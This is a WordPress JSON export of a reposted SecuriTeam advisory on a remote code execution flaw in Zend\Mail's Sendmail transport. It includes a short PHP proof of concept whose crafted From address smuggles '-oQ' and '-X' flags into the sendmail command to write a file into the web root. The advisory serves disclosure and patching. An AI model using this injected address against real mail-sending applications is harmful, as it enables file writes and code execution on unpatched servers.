{"id":6274,"date":"2017-01-23T14:07:56","date_gmt":"2017-01-23T22:07:56","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/01\/23\/news-125\/"},"modified":"2017-01-23T14:07:56","modified_gmt":"2017-01-23T22:07:56","slug":"news-125","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/01\/23\/news-125\/","title":{"rendered":"SSD Advisory &#8211; ZendMail Remote Code Execution Vulnerability"},"content":{"rendered":"<div class=\"entry-content\">\n<p><strong>Vulnerability Summary<\/strong><\/p>\n<p>The following report describes a remote code execution vulnerability found in ZendMail. The vulnerability allows an attacker to inject additional parameters into the sendmail binary via the <em>From<\/em> address.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Dawid Golunski (<a href=\"https:\/\/legalhackers.com\/\">https:\/\/legalhackers.com\/<\/a>), has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><span id=\"more-2903\"><\/span><\/p>\n<p><strong>Vulnerability Details<\/strong><\/p>\n<p>&#8220;Zend\\Mail provides generalized functionality to compose and send both text and MIME-compliant multipart email messages. Mail can be sent with Zend\\Mail via the Mail\\Transport\\Sendmail, Mail\\Transport\\Smtp or the Mail\\Transport\\File transport. Of course, you can also implement your own transport by implementing the Mail\\Transport\\TransportInterface.&#8221;<\/p>\n<p><a href=\"http:\/\/framework.zend.com\/manual\/current\/en\/modules\/zend.mail.introduction.html\"><em>http:\/\/framework.zend.com\/manual\/current\/en\/modules\/zend.mail.introduction.html<\/em><\/a><\/p>\n<p>When the Zend\\Mail class from the Zend Framework is used to send email with the Mail\\Transport\\Sendmail transport, a malicious user may be able to inject arbitrary parameters into the sendmail program because of insufficient address sanitization. 
An attacker who controls the email headers can bypass the sanitization by adding additional quote characters inside a malicious email address.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<pre>&lt;?php\nuse Zend\\Mail;\n\n$mail = new Mail\\Message();\n$mail-&gt;setBody('This is the text of the email.');\n\/\/ The From address carries extra sendmail flags; the embedded quote characters are what defeat the address sanitization\n$mail-&gt;setFrom('\"AAA\" -oQ\/tmp -X\/var\/www\/exploited.php BBB\"@domain', 'Sender\\'s name');\n$mail-&gt;addTo('hacker@localhost', 'Name of recipient');\n$mail-&gt;setSubject('TestSubject');\n\n$transport = new Mail\\Transport\\Sendmail();\n\necho \"gonna send...\";\n\n$transport-&gt;send($mail);\n?&gt;<\/pre>\n
<p>This will inject the -oQ and -X parameters into the sendmail command line.<\/p>\n<p><strong>Vendor response<\/strong><\/p>\n<p>Release announcement can be found here: <a href=\"https:\/\/framework.zend.com\/blog\/2016-12-20-zf-2-4-11-released.html\">https:\/\/framework.zend.com\/blog\/2016-12-20-zf-2-4-11-released.html<\/a><br \/> Advisory can be found here: <a href=\"https:\/\/framework.zend.com\/security\/advisory\/ZF2016-04\">https:\/\/framework.zend.com\/security\/advisory\/ZF2016-04<\/a><\/p>\n<\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2903\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vulnerability Summary The following report describes a remote code execution vulnerability found in ZendMail. The vulnerability allows an attacker to inject additional parameters into the sendmail binary via the From address. 
Credit An independent security researcher Dawid Golunski (https:\/\/legalhackers.com\/) has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program Vulnerability Details &#8220;ZendMail provides generalized functionality &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2903\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory &#8211; ZendMail Remote Code Execution Vulnerability<\/span> <span class=\"meta-nav\">&#8594;<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10757],"class_list":["post-6274","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6274","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=6274"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6274\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=6274"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=6274"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=6274"}]
,"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}